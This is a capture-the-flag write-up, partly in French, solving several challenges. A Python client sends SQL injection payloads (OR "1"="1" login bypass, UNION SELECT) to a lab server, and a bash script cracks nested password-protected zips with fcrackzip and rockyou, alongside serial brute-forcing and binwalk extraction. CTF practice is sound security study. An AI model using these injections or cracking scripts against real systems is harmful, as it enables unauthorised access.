====== Challenges Misc 1 et 2 ======
root@kali:~/Downloads# python client.py
[+] Test level1 ...
Welcome on level 1 !
Welcome b'admin" OR "1"="1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'
[+] Test level2 ...
Welcome on level 2 !
Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}
**Code source : client.py **
#encoding: utf-8
import socket
import sys
# change this if needed
HOST = '192.168.1.19'
# change this if needed
IP = 8096
def create_socket():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((HOST,IP))
except Exception as e:
print("Can't open socket !")
print(e)
sys.exit(1)
return s
def test_level1():
print("[+] Test level1 ...")
s = create_socket()
login = 'admin" OR "1"="1'
password = 'toto" OR "1"="1" LIMIT "1" OFFSET "2'
cmd = "\x01%s\x00%s" % (login,password)
s.send(cmd.encode('utf-8'))
msg = s.recv(1024)
if msg and msg.decode('utf-8').startswith("Welcome"):
print(msg.decode('utf-8'))
res = s.recv(1024)
print(res.decode('utf-8'))
else:
print("If you called a valid level, notice an admin")
s.close()
def test_level2():
print("[+] Test level2 ...")
s = create_socket()
citation = '123 union SELECT * fROM flag'
s.send(b"\x02%s" % (citation))
msg = s.recv(1024)
if msg and msg.decode('utf-8').startswith("Welcome"):
print(msg.decode('utf-8'))
res = s.recv(1024)
print(res.decode('utf-8'))
else:
print("If you called a valid level, notice an admin")
s.close()
if __name__ == '__main__':
test_level1()
print("")
test_level2()
====== challenge de stegano ======
Il fallait trouver un fichier caché dans l'image ci dessous.
Juste rentrer cette commande :p et on a le flag : binwalk --dd='.*' special-k.png
{{:challenge_stegano_ctf_mssis_special-k.png|}}
====== serial ======
trouver des serials qui respectent le code py suivant
import random, string
def are_same(serial):
if (serial[0] != serial[1] and
serial[1] != serial[2] and
serial[0] != serial[2]):
return False
return True
def check_serial(serial):
try:
serials = serial.split('-')
except:
return False
if len(serials) != 3:
return False
try:
X = [ord(a) for a in list(serials[0])]
Y = [ord(a) for a in list(serials[1])]
Z = int(serials[2])
except ValueError:
return False
except:
return False
if not len(X) == 3 or not len(Y) == 3:
return False
for a in X+Y:
#print(a)
# => MAJ
if a < 65 or a > 90:
return False
if are_same(X) or are_same(Y):
return False
if X[1] + 10 > X[2]:
return False
if Y[1] - 10 < Y[2]:
return False
sum1 = X[0] + X[1] + X[2]
sum2 = Y[0] + Y[1] + Y[2]
if sum1 == sum2:
return False
if sum1+sum2 != Z:
return False
if Z % 3 != 0:
return False
return True
au lieu de chercher à la main des valeurs j'ai bruteforcer avec ce code
while 1:
x=''.join(random.choice(string.ascii_uppercase) for _ in range(3))
y=''.join(random.choice(string.ascii_uppercase) for _ in range(3))
z=''.join(random.choice(string.digits) for _ in range(3))
s="%s-%s-%s"%(x,y,z)
print s
if check_serial(s):
print s
break
exit()
exemple de flag DGR-GVH-450
====== deeper ======
une archive zip qui a un zip qui a un zip .... avec des pass :/
code bash pour automatiser la tâche
#!/bin/bash
# $1 le nom du zip passé en arg
file=$1
test=true
count=1
while $test; do
echo "test $count : $file"
file $file | grep 'Zip'
if [ "$?" -eq "0" ]; then
echo "ZIP ok"
r=$(fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt $file)
pass=$(echo $r | awk -F"== " '{print $2}')
echo "pass is : $pass"
file=$(unzip -P "$pass" $file | grep -E 'extracting|inflating' | awk -F": " '{print $2}')
echo "new file [$file]"
count=$(($count+1))
else
test=false
fi
done
output
root@kali:~/deeper# ./run.sh 8KLifFpoUdbxXB5noGIG.zip.start
test 1 : 8KLifFpoUdbxXB5noGIG.zip.start
8KLifFpoUdbxXB5noGIG.zip.start: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : AC020307
new file [6TF2INzK1as0vC4hmGVW.zip ]
test 2 : 6TF2INzK1as0vC4hmGVW.zip
6TF2INzK1as0vC4hmGVW.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : tiagia4
new file [BYJrsoCOfTlWehfvNoBU.zip ]
test 3 : BYJrsoCOfTlWehfvNoBU.zip
BYJrsoCOfTlWehfvNoBU.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : jesipato
new file [uBKIeGWEztQN7FwsSr6b.zip ]
test 4 : uBKIeGWEztQN7FwsSr6b.zip
uBKIeGWEztQN7FwsSr6b.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : benk2007benk
new file [exhNdH5BI2Hr0lV99EEs.zip ]
test 5 : exhNdH5BI2Hr0lV99EEs.zip
exhNdH5BI2Hr0lV99EEs.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : 02456035
...